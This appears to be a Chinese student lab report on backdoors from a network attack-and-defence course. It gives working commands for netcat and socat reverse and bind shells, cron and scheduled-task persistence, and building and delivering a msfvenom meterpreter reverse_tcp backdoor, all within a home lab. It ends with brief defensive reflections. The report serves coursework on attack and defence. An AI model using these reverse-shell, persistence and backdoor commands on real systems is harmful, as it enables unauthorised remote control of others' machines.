2018-2019-2 20162318《网络对抗技术》Exp2 后门原理与实践

一、实验内容

---

1.使用netcat获取主机操作Shell，cron启动

2.使用socat获取主机操作Shell, 任务计划启动

3.使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

4.使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝

---

二、实验步骤

2.1 使用netcat获取主机操作Shell，cron启动

2.1.1 windows下获得一个linux shell

step1. 在Windows中使用ipconfig查看本机ip地址

step2. 在Windows中使用ncat.exe程序打开监听

 ncat.exe -l -p 2318

step3. 在kali中反弹连接Windows

ncat 192.168.88.1 2318 -e /bin/sh

step4. Windows成功获得kali的shell，并使用ls命令查看当前目录

2.1.2 Linux 下获得Windows的cmd程序，cron启动

step1.
在Windows系统下，监听2318端口

 ncat.exe -l -p 2318

step2.在Kali环境下，用crontab -e指令编辑一条定时任务，选择编辑器时选择3

step3.在最后一行添加

10 * * * * /bin/netcat 192.168.88.1 2318 -e /bin/sh  //在每小时的第10分钟反向连接Windows主机的2318端口

step4.时间到达10分时，如下图所示：

2.2 使用socat获取主机操作Shell, 任务计划启动

2.2.1 Linux 下获得Windows的cmd程序

step1.在kali中使用ifconfig查看IP

step2.在kali中打开监听

nc -l -p 2318

step3.在Windows中反弹连接kali

ncat.exe -e cmd.exe 192.168.187.128 2318

step4.kali成功获得Windows的命令提示，并使用dir命令查看当前目录

2.2.2 使用socat获取主机操作Shell, 任务计划启动

step1.在“任务计划程序”中“创建任务”

step2.填写任务名

step3.填写触发器

step4.填写操作，导入socat.exe的路径，并添加参数：tcp-listen:2318 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口2318，同时把cmd.exe的stderr重定向到stdout上)

step5.到达约定时间后，在Kali环境下输入指令

socat -tcp:192.168.88.1:2318

此时可以发现已经成功获得了WINDOWSd的cmd shell

2.3 使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

step1.在Kali上执行指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.187.128 LPORT=2318 -f exe > 20162318_backdoor.exe

step2.在Windows下执行

ncat.exe -lv 2318 > 20162318_backdoor.exe

step3.在Linux中执行

nc 192.168.88.1 2318 < 20162318_backdoor.exe

step4.在Kali上输入msfconsole指令进入msf控制台

root@20162318:~# msfconsole

step5.依次输入

use exploit/multi/handler //使用监听模块，设置payload

set payload windows/meterpreter/reverse_tcp /使用和生成后门程序时相同的payload

set LHOST 192.168.187.128 //设置ip

set LPORT 2318 //设置端口

step6.使用exploit开始监听

step7.运行Windows下的后门程序

step8.Linux获得Windows主机的连接，并且得到了远程控制的shell

2.4使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

step1.完成2.3的全部操作

step2.使用screenshot指令进行截屏

step3.尝试提权和获取摄像头权限失败

三、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

当我们打开一个钓鱼邮件时，如果后台自动下载并安装木马程序，自动运行，因此在系统留下后门。

下载游戏修改器也可能会有后门

(2)例举你知道的后门如何启动起来(win及linux)的方式？

打开一些游戏的作弊器

通过修改注册表设置为开机自启动

(3)Meterpreter有哪些给你映像深刻的功能

截取受害主机的图片，获取录音等等

(4)如何发现自己有系统有没有被安装后门？

定期使用杀毒软件进行杀毒

四、实验总结与体会

本次实验使我明白了后门的可怕之处，所以以后要在正规网站下载正规软件，不下载游戏外挂之类可能会藏有后门的软件，其次是定期使用杀毒软件进行杀毒，防止存在有后门软件的软件的存在。